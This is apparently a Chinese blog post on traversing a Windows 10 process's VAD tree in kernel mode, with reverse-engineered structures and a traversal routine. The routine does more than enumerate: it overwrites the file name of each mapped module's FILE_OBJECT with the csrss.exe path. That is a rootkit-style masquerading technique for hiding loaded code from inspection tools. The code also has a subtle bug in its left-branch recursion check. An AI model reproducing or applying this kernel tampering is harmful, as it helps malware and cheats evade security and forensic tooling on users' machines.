win 10 64 14393遍历进程VAD

typedef struct _SEGMENT{
 /*(*((ntkrnlmp!_SEGMENT *)0xffffa405114286d0))[Type:_SEGMENT]
  [+0x000] ControlArea      : 0xffffd18b3276d370[Type:_CONTROL_AREA *]
  [+0x008] TotalNumberOfPtes : 0xa[Type:unsigned long]
  [+0x00c] SegmentFlags[Type:_SEGMENT_FLAGS]
  [+0x010] NumberOfCommittedPages : 0x0[Type:unsigned __int64]
  [+0x018] SizeOfSegment : 0xa000[Type:unsigned __int64]
  [+0x020] ExtendInfo : 0x5dd00000[Type:_MMEXTEND_INFO *]
  [+0x020] BasedAddress : 0x5dd00000[Type:void *]
  [+0x028] SegmentLock[Type:_EX_PUSH_LOCK]
  [+0x030] u1[Type:]
  [+0x038] u2[Type:]
  [+0x040] PrototypePte : 0xffffa4050feab820[Type:_MMPTE *]*/
 PVOID ControlArea;
 LONG32 TotalNumberOfPtes;
 LONG32 SegmentFlags;
 ULONG64 NumberOfCommittedPages;
 ULONG64 SizeOfSegment;
 ULONG64 BasedAddress;//这里也可以利用PE结构体获取模块名字
 //.............


}SEGMENT,*PSEGMENT;
typedef struct _EX_FAST_REF
{
 union
 {
  PVOID Object;
  ULONG_PTR RefCnt : 3;
  ULONG_PTR Value;
 };
} EX_FAST_REF, *PEX_FAST_REF;
typedef struct _CONTROL_AREA {
 /**
 (*((ntkrnlmp!_CONTROL_AREA *)0xffffd18b3276d370))[Type:_CONTROL_AREA]
  [+0x000] Segment          : 0xffffa405114286d0[Type:_SEGMENT *]
  [+0x008] ListHead[Type:_LIST_ENTRY]
  [+0x018] NumberOfSectionReferences : 0x1[Type:unsigned __int64]
  [+0x020] NumberOfPfnReferences : 0xa[Type:unsigned __int64]
  [+0x028] NumberOfMappedViews : 0x4[Type:unsigned __int64]
  [+0x030] NumberOfUserReferences : 0x5[Type:unsigned __int64]
  [+0x038] u[Type:]
  [+0x03c] u1[Type:]
  [+0x040] FilePointer[Type:_EX_FAST_REF]
  [+0x048] ControlAreaLock : 0[Type:long]
  [+0x04c] ModifiedWriteCount : 0x0[Type:unsigned long]
  [+0x050] WaitList : 0x0[Type:_MI_CONTROL_AREA_WAIT_BLOCK *]
  [+0x058] u2[Type:]
  [+0x068] FileObjectLock[Type:_EX_PUSH_LOCK]
  [+0x070] LockedPages : 0x1[Type:unsigned __int64]
  [+0x078] u3[Type:]
  */
 PSEGMENT  Segment;//这个里面也包含本身CONTROL_AREA
 LIST_ENTRY ListHead;//不清楚不研究它
 unsigned __int64 NumberOfSectionReferences; //引用次数?
 unsigned __int64 NumberOfPfnReferences;//pfn??
 unsigned __int64 NumberOfMappedViews;//映射页面数?
 unsigned __int64 NumberOfUserReferences;//用户??
 ULONG32 u;//这个也不知道是啥
 ULONG32 u1;//同上
 EX_FAST_REF FilePointer;//这就是要找的了。///
  long ControlAreaLock;//这个锁不清楚怎么玩。
  //.........
  //............
}CONTROL_AREA,*PCONTROL_AREA;
typedef struct _SUBSECTION {
 
 PCONTROL_AREA ControlArea;
 struct MMPTE* SubsectionBase;
 struct _SUBSECTION* NextSubsection;
  /*+ 0x018 GlobalPerSessionHead : _RTL_AVL_TREE
  + 0x018 CreationWaitList : Ptr64 _MI_CONTROL_AREA_WAIT_BLOCK
  + 0x018 SessionDriverProtos : Ptr64 _MI_PER_SESSION_PROTOS
  + 0x020 u :
  +0x024 StartingSector : Uint4B
  + 0x028 NumberOfFullSectors : Uint4B
  + 0x02c PtesInSubsection : Uint4B
  + 0x030 u1 :
  +0x034 UnusedPtes : Pos 0, 31 Bits
  + 0x034 DirtyPages : Pos 31, 1 Bit
  + 0x034 u2 : */

}SUBSECTION,*PSUBSECTION;
#pragma pack(1)
typedef struct __MMVAD{
/*
 +0x000 Core             : _MMVAD_SHORT
  + 0x040 u2 :
  +0x048 Subsection : Ptr64 _SUBSECTION
  + 0x050 FirstPrototypePte : Ptr64 _MMPTE
  + 0x058 LastContiguousPte : Ptr64 _MMPTE
  + 0x060 ViewLinks : _LIST_ENTRY
  + 0x070 VadsProcess : Ptr64 _EPROCESS
  + 0x078 u4 :
  +0x080 FileObject : Ptr64 _FILE_OBJECT*/
 char Core[0x40];
 ULONG64 u2;
 PSUBSECTION Subsection;
 PMMPTE FirstPrototypePte;
 PMMPTE LastContiguousPte;
 LIST_ENTRY64 ViewLinks;
 PEPROCESS VadsProcess;
 ULONG64 u4;
 PFILE_OBJECT FileObject;
}MMVAD,*PMMVAD;
#pragma  pack()

VOID VadPreOrderTraverse(PRTL_BALANCED_NODE VaddTree) {
 if (MmIsAddressValid(VaddTree))
 {
  
  PSUBSECTION L_Subsection = ((PMMVAD)VaddTree)->Subsection;
   PVOID64 L_VadsProcess = ((PMMVAD)VaddTree)->VadsProcess;
   PVOID64 L_FileObject = ((PMMVAD)VaddTree)->FileObject;
 // __debugbreak();
  //初步来看 VADPROCESS _Subsection重要

  if (MmIsAddressValid(L_VadsProcess)) { //VadProcess 有效/说明是一个模块
   if (MmIsAddressValid(((PMMVAD)VaddTree)->Subsection) && MmIsAddressValid(((PMMVAD)VaddTree)->Subsection->ControlArea) && MmIsAddressValid(((PMMVAD)VaddTree)->Subsection->ControlArea->FilePointer.Value))
   {
    PFILE_OBJECT file_object =( (L_Subsection->ControlArea->FilePointer.Value )>> 3 )<< 3;//拿到File_object
    if (MmIsAddressValid(file_object))
    {
     __try {
      memset(file_object->FileName.Buffer, 0x0, file_object->FileName.MaximumLength);
      memcpy(file_object->FileName.Buffer, L"C:\\WINDOWS\\system32\\csrss.exe", sizeof(L"C:\\WINDOWS\\system32\\csrss.exe"));
      file_object->FileName.Length = sizeof(L"C:\\WINDOWS\\system32\\csrss.exe");
      DbgPrint("File Name:%wZ \n", &file_object->FileName);
     }
     __except (1) { DbgPrint(("exception")); }
      //DbgPrint("file_object :%p MMVAD:%p %S \n", file_object, VaddTree, ModuleName);
    }
  
    
   }
  }
  

 if (MmIsAddressValid(VaddTree->Right))
  VadPreOrderTraverse(VaddTree->Right);
 if (MmIsAddressValid(VaddTree->Left));
 VadPreOrderTraverse(VaddTree->Left);
 }
}

你可能感兴趣的:(windwos内核,逆向)